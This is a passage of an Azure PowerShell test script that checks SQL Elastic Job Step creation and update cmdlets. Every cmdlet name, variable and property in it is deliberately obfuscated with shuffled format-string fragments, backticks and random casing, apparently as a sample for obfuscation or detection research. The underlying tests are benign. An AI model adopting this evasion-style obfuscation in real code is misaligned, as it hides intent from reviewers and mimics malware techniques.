	&("{0}{1}{2}{3}"-f 'Asser','t-','AreE','qual') ${j`S1}."O`UtP`Ut"."c`REDENT`IaL" ${J`C1}."C`REd`enTi`ALn`AMe"

	
	${J`SN1} = &("{2}{3}{0}{1}"-f'StepN','ame','Get-J','ob')
	${j`s1} = &("{1}{0}{4}{2}{3}"-f 'd-AzS','Ad','J','obStep','qlElastic') -ParentResourceId ${J`1}."Re`soUrce`ID" -Name ${Js`N1} -TargetGroupName ${T`G1}."TarGE`TGrOUP`NA`ME" -CredentialName ${j`c1}."CredE`NT`ia`L`NaMe" -CommandText ${C`T1} -TimeoutSeconds 1000 -RetryAttempts 100 -InitialRetryIntervalSeconds 10 -MaximumRetryIntervalSeconds 1000 -RetryIntervalBackoffMultiplier 5.0 -OutputDatabaseResourceId ${d`B1}."RES`o`UrCEid" -OutputTableName ${T`ABL`en`AMe} -OutputCredentialName ${j`c1}."crED`E`N`T`IALname" -OutputSchemaName ${SchEMA`N`AMe}
	&("{1}{0}{3}{2}"-f'-AreE','Assert','ual','q') ${j`S1}."RES`oU`RcE`gRo`UpNaME" ${A`1}."ReS`OU`Rceg`R`ouPnAMe"
	&("{3}{2}{1}{0}"-f 'qual','eE','Ar','Assert-') ${J`S1}."s`ervER`NAME" ${a1}."Se`Rver`NamE"
	&("{3}{1}{2}{0}"-f 'Equal','ssert-','Are','A') ${j`S1}."age`Nt`NAmE" ${A1}."aGEnT`N`Ame"
	&("{2}{4}{3}{1}{0}" -f'l','Equa','As','e','sert-Ar') ${J`s1}."J`o`BNAmE" ${j`1}."J`ob`Name"
	&("{1}{0}{3}{2}"-f'r','Asse','l','t-AreEqua') ${j`S1}."Stepn`A`me" ${JS`N1}
	&("{3}{1}{4}{2}{0}"-f'Equal','sse','re','A','rt-A') ${J`s1}."tAR`GeTGROup`N`AMe" ${t`g1}."Ta`R`getgRoUpn`AmE"
	&("{2}{4}{3}{1}{0}" -f'al','Equ','A','sert-Are','s') ${J`S1}."CreDe`NTial`N`AME" ${J`c1}."C`REdE`Nt`IaLNAmE"
	&("{3}{0}{4}{1}{2}"-f 't-','reE','qual','Asser','A') ${J`S1}."time`OU`TSEco`NDS" 1000
	&("{1}{0}{2}"-f'-Are','Assert','Equal') ${J`s1}."re`TR`YaT`TE`MPts" 100
	&("{2}{1}{0}"-f'eEqual','r','Assert-A') ${j`s1}."InITiA`lre`T`RYi`Nt`ErVaLSeCoNDs" 10
	&("{0}{2}{3}{1}"-f 'A','qual','ss','ert-AreE') ${J`S1}."MA`x`iMUMR`ETRYIn`Ter`VaLsec`ON`DS" 1000
	&("{0}{2}{3}{1}" -f 'As','l','s','ert-AreEqua') ${j`S1}."REt`R`yint`ERvalBaCkO`FFmu`lt`iplIeR" 5.0
	&("{1}{2}{0}{3}" -f'q','Assert-Ar','eE','ual') ${j`s1}."OU`TPuT"."ResoU`RcEGRou`P`NAmE" ${D`B1}."ResO`UrCE`Gr`O`UpNaME"
	&("{0}{3}{1}{2}"-f 'A','ua','l','ssert-AreEq') ${J`s1}."outp`Ut"."seRVE`RN`AMe" ${d`B1}."sEr`VErna`me"
	&("{2}{3}{4}{0}{1}"-f'a','l','A','ssert-Ar','eEqu') ${j`s1}."OutP`UT"."d`AtA`Ba`SEnaME" ${d`B1}."dATABA`sena`me"
	&("{3}{1}{0}{2}" -f'reEqu','sert-A','al','As') ${J`s1}."ou`T`PUt"."scHem`AN`AmE" ${s`CHEmANa`me}
	&("{0}{3}{2}{1}"-f 'As','AreEqual','rt-','se') ${j`s1}."ouT`put"."TaB`LEna`mE" ${TaB`lEN`AMe}
	&("{2}{4}{0}{3}{1}" -f'eEq','l','Assert','ua','-Ar') ${j`s1}."oU`TpUT"."Cr`eDeNT`Ial" ${j`c1}."C`R`eDEnT`iaL`NamE"
}


function teST-c`RE`A`TE`joBSt`epW`itHP`iPiNG (${A`1})
{
	
	${D`B1} = ${a`1} | &("{3}{4}{1}{2}{0}" -f 'e','taba','s','Get-Azur','eRmSqlDa')
	${j`C1} = &("{7}{6}{0}{8}{5}{2}{1}{3}{4}"-f 'e','ia','t','lForTes','t','e-JobCreden','r','C','at') ${a`1}
	${T`G1} = &("{0}{1}{5}{2}{4}{3}"-f'Cr','eate-','argetGrou','est','pForT','T') ${a`1}
	${J`1} = &("{3}{0}{2}{1}{4}" -f'eate','obForTes','-J','Cr','t') ${a1}
	${c`T1} = ("{1}{0}"-f'1','SELECT ')
	${s`c`hE`mANAME} = &("{1}{4}{0}{2}{3}" -f 't-Sche','G','maN','ame','e')
	${Tab`LeNa`Me} = &("{1}{0}{2}" -f'am','Get-TableN','e')

	
	${js`N1} = &("{0}{2}{3}{1}" -f'G','tepName','et','-JobS')
	${j`S1} = ${J`1} | &("{3}{2}{0}{1}{4}" -f'ast','i','-AzSqlEl','Add','cJobStep') -Name ${J`SN1} -TargetGroupName ${T`G1}."TargetG`ROu`P`NAMe" -CredentialName ${j`c1}."Cr`edEnt`IaL`Na`mE" -CommandText ${c`T1}
	&("{2}{3}{0}{1}"-f 't-A','reEqual','Ass','er') ${J`s1}."RES`ou`R`cEGRO`UpnaME" ${a1}."RESO`U`RcEg`R`oupNaME"
	&("{3}{2}{1}{0}"-f 'l','a','rt-AreEqu','Asse') ${J`s1}."s`E`RverName" ${a`1}."S`e`RVernAME"
	&("{2}{1}{3}{0}" -f 'al','ert-Are','Ass','Equ') ${J`S1}."a`Ge`NTnAME" ${A1}."Age`N`Tna`ME"
	&("{1}{0}{4}{2}{3}"-f 'ssert-Are','A','qua','l','E') ${j`s1}."j`OBNaMe" ${j1}."JO`BNA`Me"
	&("{4}{0}{1}{3}{2}"-f't-A','reEq','l','ua','Asser') ${j`S1}."S`TE`pnamE" ${js`N1}
	&("{2}{1}{0}{3}"-f'ert','ss','A','-AreEqual') ${J`S1}."TARGeTgRo`UPn`AMe" ${T`g1}."tArGeT`g`ROU`PNA`Me"
	&("{2}{0}{1}" -f 'ert-Are','Equal','Ass') ${j`S1}."Cr`e`dENTi`ALn`AME" ${j`C1}."Cr`ede`NTIalNaMe"
	&("{2}{3}{0}{1}"-f'AreEq','ual','Asse','rt-') ${J`S1}."CoM`m`AnDtEXT" ${c`T1}
	&("{2}{0}{1}"-f'ert-Nul','l','Ass') ${J`S1}."oUtp`Ut"

	
	${Js`N1} = &("{2}{3}{1}{0}" -f 'me','JobStepNa','G','et-')
	${J`s1} = ${j`1} | &("{1}{2}{4}{3}{0}" -f'p','A','dd-AzSql','cJobSte','Elasti') -Name ${Js`N1} -TargetGroupName ${T`G1}."t`ARGET`g`ROU`PNaMe" -CredentialName ${j`C1}."cr`Ede`Nt`IALn`Ame" -CommandText ${C`T1} -TimeoutSeconds 1000 -RetryAttempts 100 -InitialRetryIntervalSeconds 10 -MaximumRetryIntervalSeconds 1000 -RetryIntervalBackoffMultiplier 5.0 -OutputDatabaseObject ${D`B1} -OutputTableName ${tAb`lENA`me} -OutputCredentialName ${J`C1}."cRedE`NTI`Al`NA`ME" -OutputSchemaName ${s`chEMA`Na`ME}
	&("{4}{2}{0}{1}{3}" -f'eE','q','-Ar','ual','Assert') ${j`s1}."ReSouR`CegR`o`UPna`mE" ${a`1}."res`O`Ur`ceGROU`PN`AmE"
	&("{0}{2}{3}{1}" -f'A','eEqual','ss','ert-Ar') ${J`s1}."s`eR`VeRnA`ME" ${a1}."seRve`Rn`Ame"
	&("{0}{2}{1}{4}{3}" -f 'A','rt-AreE','sse','l','qua') ${j`s1}."AGen`TnA`ME" ${A`1}."A`g`enTnamE"
	&("{0}{3}{1}{4}{2}" -f'As','-A','l','sert','reEqua') ${J`s1}."j`O`BNaME" ${j1}."jo`B`NaMe"
	&("{0}{2}{1}"-f'Ass','t-AreEqual','er') ${J`s1}."sTe`p`NAme" ${j`sN1}
	&("{1}{0}{3}{2}"-f 'A','Assert-','eEqual','r') ${J`s1}."ta`RG`ETgRO`UP`NAMe" ${T`G1}."tArGETgr`ouPnA`me"
	&("{1}{0}{2}{3}{4}" -f '-Are','Assert','E','qua','l') ${j`S1}."cR`EDe`N`TialnA`ME" ${j`C1}."c`R`E`DENTIAlna`me"
	&("{4}{1}{2}{0}{3}"-f 't-Are','s','er','Equal','As') ${J`S1}."t`Im`eoUTS`eCON`dS" 1000
	&("{1}{0}{2}"-f'eEq','Assert-Ar','ual') ${J`S1}."rE`Tr`YATt`emP`Ts" 100
	&("{2}{0}{1}{3}" -f 'sert-Are','Equ','As','al') ${j`S1}."ini`TIal`R`eTR`YINteRVALSE`COnDS" 10
	&("{1}{3}{4}{2}{0}"-f'l','A','rt-AreEqua','ss','e') ${j`S1}."mAXIM`UMr`e`TRy`iNtERV`A`lSecOndS" 1000
	&("{1}{0}{3}{2}"-f 'se','As','qual','rt-AreE') ${J`S1}."REtrYIn`T`ERvalb`A`CKOffmUlTipLI`Er" 5.0
	&("{0}{3}{2}{1}"-f 'As','l','reEqua','sert-A') ${J`S1}."ouTp`UT"."re`SoU`R`c`eGRO`UpNaMe" ${D`B1}."Res`OurC`eGr`oUPName"
	&("{1}{4}{3}{0}{2}" -f 'u','Assert','al','q','-AreE') ${J`S1}."o`UTpUt"."SE`R`VErnamE" ${D`B1}."s`ErvEr`NaMe"
	&("{1}{0}{2}{3}" -f 'ser','As','t-','AreEqual') ${j`S1}."oUT`PUT"."DaTabAsEn`A`me" ${d`B1}."dAT`A`BaSEn`AmE"
	&("{3}{2}{0}{1}"-f'r','t-AreEqual','sse','A') ${j`s1}."OUt`P`Ut"."sc`HeMANA`mE" ${sC`HeM`A`NamE}
	&("{3}{1}{0}{2}"-f't-A','r','reEqual','Asse') ${j`S1}."oU`TPuT"."TAble`NA`me" ${ta`Bl`eNA`ME}
	&("{0}{3}{2}{1}"-f 'A','al','u','ssert-AreEq') ${j`S1}."O`UtPut"."cRe`dENt`Ial" ${J`C1}."cr`E`dentiAlnA`Me"

	
	${JS`N1} = &("{0}{3}{2}{1}"-f'Get-JobStepN','e','m','a')
	${j`S1} = ${j1} | &("{2}{4}{1}{0}{3}"-f'AzSqlElasti','-','Ad','cJobStep','d') -Name ${JS`N1} -TargetGroupName ${t`G1}."tARge`T`GrO`UPN`AMe" -CredentialName ${J`C1}."cr`ede`NTiALn`A`mE" -CommandText ${C`T1} -TimeoutSeconds 1000 -RetryAttempts 100 -InitialRetryIntervalSeconds 10 -MaximumRetryIntervalSeconds 1000 -RetryIntervalBackoffMultiplier 5.0 -OutputDatabaseResourceId ${D`B1}."rEs`OUR`CeID" -OutputTableName ${tAB`LEnA`Me} -OutputCredentialName ${j`c1}."CRE`D`E`NtIALnaME" -OutputSchemaName ${sC`hEmAN`AMe}
	&("{2}{0}{1}{3}{4}"-f'sert-','AreE','As','qua','l') ${J`S1}."RE`SOUrCegROu`p`NaME" ${a`1}."REs`o`URCEgrOu`Pn`A`mE"
	&("{0}{3}{1}{2}" -f 'Ass','eEqua','l','ert-Ar') ${J`s1}."ser`VErn`Ame" ${A1}."Se`RVeRnA`Me"
	&("{3}{2}{1}{0}"-f 'Equal','ert-Are','s','As') ${j`s1}."ag`entnA`mE" ${A1}."agE`N`TNAMe"
	&("{0}{2}{3}{1}"-f'Assert','ual','-','AreEq') ${j`s1}."JoBNA`mE" ${J`1}."J`OBN`AMe"
	&("{1}{2}{0}"-f'al','Asser','t-AreEqu') ${j`S1}."StE`p`NamE" ${J`SN1}
	&("{1}{2}{4}{0}{3}" -f'q','Assert-A','re','ual','E') ${J`s1}."T`ArGE`Tg`Rou`pnAME" ${t`G1}."tArGEtG`RO`UpNA`Me"
	&("{1}{2}{3}{0}"-f 'l','As','se','rt-AreEqua') ${j`s1}."C`REdeN`TialN`AME" ${J`c1}."cr`E`dENtiAL`NaMe"
	&("{1}{3}{0}{2}"-f 'reEq','As','ual','sert-A') ${J`s1}."T`IMEout`sEcON`dS" 1000
	&("{1}{0}{2}{3}"-f 'sert-AreEq','As','ua','l') ${J`S1}."r`ETRYa`TtE`mp`Ts" 100
	&("{4}{0}{3}{2}{1}"-f't','al','eEqu','-Ar','Asser') ${j`s1}."iNitIa`LR`eTR`yint`e`RvaL`sEcOndS" 10
	&("{0}{1}{3}{2}{4}" -f 'A','s','eEqu','sert-Ar','al') ${J`s1}."MaX`i`mUMRetRY`InT`ErVaLSECo`Nds" 1000
	&("{1}{2}{3}{0}{4}" -f't-AreEqu','A','s','ser','al') ${J`S1}."ReTrYInt`ERVaLBacK`oFFMu`l`T`iplier" 5.0
	&("{0}{2}{4}{1}{3}"-f 'As','reEq','sert','ual','-A') ${J`s1}."o`UT`PuT"."rESO`UR`C`eGROUPnA`ME" ${D`B1}."r`E`SOuRCEGR`o`UPNAmE"
	&("{0}{4}{1}{3}{2}"-f 'A','t-Ar','al','eEqu','sser') ${j`S1}."OUt`P`UT"."S`eRvErNA`mE" ${d`B1}."serVER`NA`me"
	&("{2}{3}{0}{1}" -f 'q','ual','Ass','ert-AreE') ${j`S1}."O`UTpUt"."d`ATaBasEN`AmE" ${d`B1}."da`TabAseNA`me"
	&("{1}{2}{0}{3}" -f 'eEq','A','ssert-Ar','ual') ${J`s1}."oU`T`pUT"."SCHe`MAnA`Me" ${SCHeM`AN`Ame}
	&("{1}{0}{2}" -f'rt-Ar','Asse','eEqual') ${J`s1}."o`UTput"."TA`Blen`A`ME" ${ta`BLeNA`ME}
	&("{2}{4}{0}{3}{1}"-f 't-A','qual','As','reE','ser') ${j`S1}."oU`TPUt"."cReDENT`i`Al" ${J`C1}."crEdENt`i`Al`NAME"
}


function tES`T-UpDatE`jOB`ST`EpwithDE`F`AULT`paRAm (${A1})
{
	
	${j`c1} = &("{5}{7}{3}{1}{8}{2}{0}{6}{4}"-f'a','rede','ti','C','ForTest','Create-J','l','ob','n') ${a`1}
	${j`C2} = &("{2}{4}{3}{1}{5}{6}{0}"-f'orTest','bC','Cr','e-Jo','eat','redent','ialF') ${a1}
	${T`g1} = &("{4}{6}{3}{0}{2}{1}{5}" -f 'te-','rgetGroupF','Ta','ea','C','orTest','r') ${a`1}
	${T`g2} = &("{4}{2}{1}{3}{0}" -f'orTest','TargetGr','ate-','oupF','Cre') ${A`1}
	${J`1} = &("{2}{1}{3}{0}" -f 'orTest','te-','Crea','JobF') ${A1}
	${c`T1} = ("{2}{1}{0}" -f ' 1','ELECT','S')
	${c`T2} = ("{2}{1}{0}"-f ' 2','CT','SELE')
	${J`S1} = &("{3}{1}{4}{2}{5}{0}"-f 'st','reate-J','bS','C','o','tepForTe') ${j1} ${t`g1} ${J`c1} ${C`T1}
	${D`B1} = ${A`1} | &("{0}{6}{3}{4}{1}{5}{2}" -f'G','SqlDa','e','-Azure','Rm','tabas','et')
	${SC`hEmAN`A`ME} = ("{0}{1}"-f 'schem','a1')
	${sCHeM`Ana`ME2} = ("{1}{2}{0}" -f'a2','sche','m')
	${taBl`e`N`AMe} = ("{1}{0}{2}"-f 'ab','t','le1')
	${taBL`enAM`E2} = ("{0}{2}{1}" -f 't','2','able')

	
	${R`esP} = &("{0}{2}{1}{4}{3}" -f 'Set-AzSqlE','ob','lasticJ','p','Ste') -ResourceGroupName ${j`S1}."resource`gRo`Upna`me" -ServerName ${j`s1}."Ser`VeR`NAme" -AgentName ${j`s1}."aGe`NtN`AME" -JobName ${J`s1}."jOB`NaME" -Name ${J`s1}."ste`p`Name" -TargetGroupName ${t`g2}."tARge`Tg`RoU`pn`Ame"
	&("{4}{3}{2}{1}{0}" -f'Equal','e','r','rt-A','Asse') ${Re`sP}."T`ARgE`TGrO`U`pNaMe" ${t`G2}."ta`R`get`gRO`UPnaMe"

	
	${r`esP} = &("{1}{2}{0}{3}{4}" -f 'obS','Set-AzSqlElasti','cJ','te','p') -ResourceGroupName ${J`s1}."r`eS`ourcegR`oU`pNAmE" -ServerName ${j`s1}."SeRV`eRn`AMe" -AgentName ${J`s1}."AGEn`TnaME" -JobName ${j`s1}."J`oBna`mE" -Name ${j`S1}."sT`epNaMe" -CredentialName ${J`C2}."C`ReDeN`TiaL`N`AME"
	&("{0}{1}{2}" -f'Assert-','AreEq','ual') ${rE`sp}."CreDEn`TI`Aln`AmE" ${J`c2}."c`ReDe`NT`iA`LNAmE"

	
	${Re`SP} = &("{2}{3}{5}{1}{4}{0}" -f 'p','astic','S','et','JobSte','-AzSqlEl') -ResourceGroupName ${J`s1}."rESOurceGRo`U`pnA`ME" -ServerName ${J`s1}."SErv`ER`Name" -AgentName ${J`s1}."aGENt`NAMe" -JobName ${J`s1}."Jo`BN`Ame" -Name ${J`S1}."st`EPn`AmE" -CommandText ${C`T2}
	&("{4}{2}{0}{3}{1}"-f't-Ar','l','ser','eEqua','As') ${R`eSP}."COm`Man`dte`Xt" ${c`T2}

	
	${re`Sp} = &("{0}{3}{5}{2}{1}{4}"-f 'Se','bSte','icJo','t-AzSqlElas','p','t') -ResourceGroupName ${j`S1}."r`ESoUrCeGRo`UP`Na`ME" -ServerName ${j`S1}."s`ErV`erN`AmE" -AgentName ${j`s1}."Ag`e`Ntname" -JobName ${J`S1}."J`obNa`Me" -Name ${j`s1}."ST`EPNA`Me" -OutputDatabaseObject ${D`B1} -OutputSchemaName ${sch`e`mAName} -OutputTableName ${tA`Bl`e`NAMe} -OutputCredentialName ${J`C1}."c`R`edEnTiaLna`me"
	&("{0}{1}{2}{3}"-f 'As','ser','t-AreEqu','al') ${RE`sp}."Ou`Tput"."resoU`Rc`eGrOU`pnamE" ${D`B1}."rESou`RcEGR`OUPn`AmE"
	&("{2}{3}{4}{0}{1}"-f '-AreEqua','l','A','sser','t') ${RE`SP}."O`UT`put"."SeRver`N`Ame" ${D`B1}."servE`Rn`AME"
	&("{1}{2}{3}{0}"-f 'ual','Assert-','Ar','eEq') ${rE`SP}."oUt`P`Ut"."DatA`BAsEna`mE" ${D`B1}."daT`ABA`Sen`AMe"
	&("{0}{1}{3}{2}{4}" -f 'Asser','t','qua','-AreE','l') ${re`sP}."OU`Tp`Ut"."sC`H`Em`ANAme" ${sChE`mAn`AmE}
	&("{1}{0}{3}{2}" -f't-','Asser','Equal','Are') ${r`ESP}."O`U`TPuT"."tABL`E`NaME" ${taBl`eNA`mE}
	&("{2}{0}{1}{3}" -f '-','AreE','Assert','qual') ${Re`sp}."o`UtP`Ut"."crEDE`NT`IaL" ${J`C1}."C`ReDEnTi`ALna`Me"

	
	${r`ESp} = &("{0}{2}{1}{3}{4}"-f 'S','asticJo','et-AzSqlEl','bSte','p') -ResourceGroupName ${J`s1}."Resou`RCEg`RoU`p`NAME" -ServerName ${J`S1}."S`eRv`ernamE" -AgentName ${j`s1}."a`ge`NtNAMe" -JobName ${J`S1}."JOBNA`Me" -Name ${J`S1}."s`TE`PnaME" -OutputDatabaseResourceId ${D`B1}."r`eSouRc`eID"
	&("{1}{2}{0}" -f'qual','Assert-Ar','eE') ${RE`sp}."O`UtpUt"."re`sOu`RCeGR`OuPn`AmE" ${D`B1}."resOUr`ce`GROuP`N`AME"
	&("{3}{0}{1}{2}"-f'rt-AreE','qu','al','Asse') ${rE`Sp}."OuT`pUt"."s`e`RverNaME" ${d`B1}."SERV`er`NaME"
	&("{1}{2}{0}"-f'qual','Asse','rt-AreE') ${Re`sp}."OU`TpUt"."DATA`BAs`Ename" ${D`B1}."Da`Taba`sen`AmE"
	&("{2}{1}{4}{3}{0}" -f'l','se','As','Equa','rt-Are') ${RE`SP}."oU`TPUt"."Sc`HEmA`NAME" ${s`C`hE`MaNAMe}
	&("{2}{1}{0}{4}{3}"-f 'A','rt-','Asse','ual','reEq') ${R`ESp}."o`Ut`Put"."tAB`le`NAMe" ${ta`BLe`NAME}
	&("{1}{2}{0}" -f 'al','Asser','t-AreEqu') ${r`eSP}."out`P`Ut"."CR`EdE`NtiAl" ${J`c1}."Cr`E`dentIA`Lna`Me"

	
	${rE`Sp} = &("{4}{5}{0}{1}{3}{2}" -f 'zS','q','icJobStep','lElast','S','et-A') -ResourceGroupName ${j`s1}."r`es`OuRce`GR`OuPnAmE" -ServerName ${j`s1}."serVE`RNa`Me" -AgentName ${J`s1}."AG`EntN`Ame" -JobName ${J`S1}."JOb`NAMe" -Name ${J`s1}."s`TEPNA`Me" -OutputSchemaName ${sCH`e`m`AnAMe2}
	&("{0}{1}{3}{2}" -f'As','ser','AreEqual','t-') ${rE`sP}."OuTP`UT"."Sc`hEMA`NAMe" ${S`cHEm`A`NAMe2}

	
	${r`Esp} = &("{5}{4}{2}{0}{3}{7}{6}{1}"-f'l','p','AzSq','E','-','Set','icJobSte','last') -ResourceGroupName ${j`s1}."RE`SourCeGrou`pN`AMe" -ServerName ${j`S1}."se`RVERna`mE" -AgentName ${j`s1}."A`gE`NTnamE" -JobName ${j`S1}."JO`B`NamE" -Name ${J`S1}."ste`pn`AMe" -OutputTableName ${t`Ab`LEn`AmE2}
	&("{0}{2}{1}"-f 'Asser','AreEqual','t-') ${rE`SP}."OuT`P`Ut"."T`AbLe`Name" ${TabLe`N`Ame2}

	
	${R`esP} = &("{0}{1}{2}{4}{3}" -f 'Set-AzSq','lElasticJob','S','ep','t') -ResourceGroupName ${J`s1}."R`EsOUr`cEGro`Up`NAme" -ServerName ${j`S1}."s`Er`VE`RnAME" -AgentName ${J`s1}."AgeNt`Na`me" -JobName ${j`s1}."j`ObnaMe" -Name ${J`S1}."sT`EPn`AME" -OutputCredentialName ${J`C2}."CreDe`Ntia`LN`AME"
	&("{1}{3}{2}{0}"-f'al','Assert-Ar','qu','eE') ${RE`Sp}."oUT`P`UT"."cRE`dE`NT`iAL" ${j`C2}."C`R`eDENtiAL`NA`mE"

	
	${Re`sP} = &("{2}{6}{1}{0}{3}{4}{5}"-f'asticJ','SqlEl','Set','o','bSt','ep','-Az') -ResourceGroupName ${J`S1}."rEsOurCeg`ROUP`N`Ame" -ServerName ${j`s1}."s`ErVerN`A`ME" -AgentName ${j`S1}."Ag`eNtN`A`Me" -JobName ${J`s1}."jo`B`NamE" -Name ${j`s1}."StEp`NA`ME" -RemoveOutput
	&("{2}{0}{1}"-f'er','t-Null','Ass') ${r`ESp}."oU`T`pUt"

	
	${R`EsP} = &("{2}{1}{0}{4}{3}"-f'z','et-A','S','ElasticJobStep','Sql') -ResourceGroupName ${J`s1}."reSoURCegROU`pn`A`Me" -ServerName ${J`S1}."S`erver`NamE" -AgentName ${j`S1}."aG`eNtN`Ame" -JobName ${J`S1}."jOBN`AMe" -Name ${J`S1}."sTEPn`AME" -TimeoutSeconds 100
	&("{1}{0}{2}"-f 'sert-AreEqu','As','al') ${re`SP}."TIM`E`outsecOnDS" 100

	
	${rE`Sp} = &("{3}{6}{2}{0}{4}{1}{5}"-f 'Sql','last','z','Set-','E','icJobStep','A') -ResourceGroupName ${J`s1}."R`ES`O`Urc`EGROUpNAmE" -ServerName ${J`s1}."seRVE`RNA`mE" -AgentName ${j`S1}."AGeN`TnA`Me" -JobName ${j`S1}."Jobna`Me" -Name ${J`s1}."S`TePnAme" -RetryAttempts 1000
	&("{3}{0}{4}{1}{2}" -f'ert-Ar','qua','l','Ass','eE') ${R`esp}."R`eTr`Y`ATTeMptS" 1000

	
	${r`Esp} = &("{3}{1}{4}{2}{0}" -f 'sticJobStep','AzSqlE','a','Set-','l') -ResourceGroupName ${j`s1}."r`EsO`U`RCeG`RoUPnAmE" -ServerName ${J`S1}."S`ERve`RNAme" -AgentName ${j`s1}."AGe`N`TnaMe" -JobName ${J`s1}."Job`N`AmE" -Name ${j`S1}."Ste`Pn`AME" -InitialRetryIntervalSeconds 100
	&("{2}{0}{3}{1}" -f 'e','eEqual','Ass','rt-Ar') ${R`esP}."initI`A`LrETRyIN`TerVA`lseC`Onds" 100

	
	${r`eSP} = &("{0}{2}{1}{5}{4}{3}" -f 'Set','SqlEla','-Az','tep','JobS','stic') -ResourceGroupName ${j`S1}."RES`OuRC`eGRoU`P`Name" -ServerName ${j`S1}."Se`RvE`Rname" -AgentName ${j`S1}."a`gEntnA`me" -JobName ${J`s1}."Jo`Bn`Ame" -Name ${j`S1}."S`TePNA`ME" -MaximumRetryIntervalSeconds 1000
	&("{3}{0}{1}{2}{4}" -f 'se','rt-A','r','As','eEqual') ${Re`sP}."m`A`x`IMUmReTrYinTE`Rv`AlsEC`on`Ds" 1000

	
	${rE`SP} = &("{0}{3}{4}{5}{6}{1}{2}" -f 'Set-AzSq','o','bStep','lE','l','a','sticJ') -ResourceGroupName ${J`s1}."rE`Sourcegr`OU`pn`AMe" -ServerName ${J`s1}."seRve`R`NAMe" -AgentName ${j`S1}."AGE`NT`NAME" -JobName ${j`S1}."jO`Bn`Ame" -Name ${j`S1}."s`TEP`NaMe" -RetryIntervalBackoffMultiplier 5.2
	&("{1}{0}{3}{4}{2}" -f'ser','As','AreEqual','t','-') ${re`sP}."reTrYiNtEr`VA`Lba`cKOf`FMuLTIpl`IeR" 5.2
}


function TeST`-u`PdAteJo`BsT`ePW`I`T`HI`Npu`TobjeCT (${a1})
{
	
	${j`C1} = &("{2}{6}{3}{1}{4}{5}{0}"-f'est','ntial','Create-','de','For','T','JobCre') ${A1}
	${j`C2} = &("{1}{4}{3}{5}{0}{2}{6}"-f 'orTe','Crea','s','edent','te-JobCr','ialF','t') ${A`1}
	${t`g1} = &("{4}{2}{3}{0}{1}{5}" -f'get','Gro','at','e-Tar','Cre','upForTest') ${a`1}
	${T`g2} = &("{5}{2}{3}{0}{4}{1}"-f 'etGro','ForTest','reate-','Targ','up','C') ${a`1}
	${J`1} = &("{2}{1}{0}{3}{4}" -f'e','eat','Cr','-JobFor','Test') ${a1}
	${C`T1} = ("{2}{1}{0}" -f 'CT 1','E','SEL')
	${c`T2} = ("{2}{0}{1}" -f 'T ','2','SELEC')
	${j`S1} = &("{1}{0}{2}{4}{3}" -f 'rea','C','te-','pForTest','JobSte') ${J1} ${t`g1} ${j`c1} ${c`T1}
	${D`B1} = ${A1} | &("{0}{2}{1}{3}" -f'G','-Azure','et','RmSqlDatabase')
	${S`chEMAnA`ME} = ("{1}{0}"-f'a1','schem')
	${s`Chem`An`AMe2} = ("{1}{0}" -f 'ema2','sch')
	${tAbL`E`NAme} = ("{2}{0}{1}" -f 'able','1','t')
	${tAb`l`e`NAme2} = ("{0}{1}" -f'tab','le2')

	
	${R`esp} = &("{1}{6}{0}{2}{4}{5}{3}"-f'zSqlElastic','Set-','J','p','obS','te','A') -InputObject ${j`s1} -TargetGroupName ${T`G2}."TA`RgET`GR`o`UPnAME"
	&("{4}{2}{1}{3}{0}"-f'l','e','ert-Ar','Equa','Ass') ${r`ESp}."Tar`Get`g`Roupn`Ame" ${T`g2}."TaRge`T`GRoUPnaMe"

	
	${re`SP} = &("{0}{5}{2}{1}{6}{4}{3}" -f'S','lE','-AzSq','obStep','cJ','et','lasti') -InputObject ${j`s1} -CredentialName ${J`C2}."c`ReD`e`NTIa`LnAME"
	&("{0}{2}{1}{3}"-f'Ass','AreEqu','ert-','al') ${re`SP}."crEdEnT`IAl`Na`mE" ${j`C2}."C`REDeN`TIALname"

	
	${R`ESp} = &("{6}{1}{2}{4}{3}{5}{0}" -f'bStep','A','zS','Elas','ql','ticJo','Set-') -InputObject ${j`S1} -CommandText ${C`T2}
	&("{1}{3}{2}{0}" -f 'al','Assert-AreE','u','q') ${R`eSp}."CO`mMANdT`ExT" ${C`T2}

	
	${rE`sp} = &("{0}{6}{5}{4}{1}{2}{3}" -f'S','obS','te','p','J','tic','et-AzSqlElas') -InputObject ${J`S1} -OutputDatabaseObject ${D`B1} -OutputSchemaName ${Sche`m`AnAme} -OutputTableName ${TA`BL`eNAme} -OutputCredentialName ${j`c1}."CREd`E`NT`iAL`Name"
	&("{3}{1}{2}{0}" -f 'l','rt-Are','Equa','Asse') ${Re`SP}."ou`TpUt"."res`oUrceGrouP`N`Ame" ${d`B1}."REsOUr`CE`groUP`NaME"
	&("{0}{4}{3}{2}{1}"-f'Ass','l','a','t-AreEqu','er') ${r`esp}."OUt`PUT"."seRV`ER`NamE" ${D`B1}."sERvE`Rn`Ame"
	&("{0}{2}{1}{3}" -f 'A','ert-','ss','AreEqual') ${Re`sp}."o`UTpUt"."dAtab`ASen`Ame" ${d`B1}."d`Atab`ASenAMe"
	&("{2}{0}{1}" -f 'A','reEqual','Assert-') ${r`ESp}."Out`put"."S`C`Heman`Ame" ${SC`HEMA`NamE}
	&("{1}{0}{4}{3}{2}" -f 'ser','As','ual','q','t-AreE') ${r`esp}."OU`Tput"."TA`BlENA`me" ${t`Ab`len`Ame}
	&("{1}{0}{2}{3}" -f'-','Assert','AreEq','ual') ${r`ESp}."out`P`UT"."c`REdE`N`TIaL" ${j`c1}."C`RedENTia`lNAme"

	
	${R`EsP} = &("{4}{2}{3}{0}{1}" -f 'S','tep','as','ticJob','Set-AzSqlEl') -InputObject ${J`s1} -OutputDatabaseResourceId ${D`B1}."R`ES`ourc`Eid"
	&("{3}{1}{0}{2}" -f 'reEqua','A','l','Assert-') ${R`esp}."o`UTpUt"."r`e`S`OURCegR`OUpnaMe" ${D`B1}."re`SoUR`ce`grOu`pNAMe"
	&("{1}{0}{4}{3}{2}" -f'se','As','eEqual','t-Ar','r') ${rE`sP}."Ou`T`put"."SEr`V`erNAME" ${D`B1}."SERv`erNa`mE"
	&("{3}{2}{1}{0}"-f 'qual','eE','ssert-Ar','A') ${Re`sP}."oUT`pUT"."d`AtaB`AS`eNaMe" ${d`B1}."daT`A`BA`sEName"

	
	${rE`sP} = &("{6}{0}{3}{4}{1}{2}{5}"-f'e','ticJo','bS','t-AzSqlEla','s','tep','S') -InputObject ${j`s1} -OutputSchemaName ${s`Chem`An`Ame2}
	&("{2}{1}{3}{0}" -f'l','ssert-','A','AreEqua') ${Re`sp}."oUtp`UT"."sCh`EM`AName" ${SCHe`Ma`Name2}

	
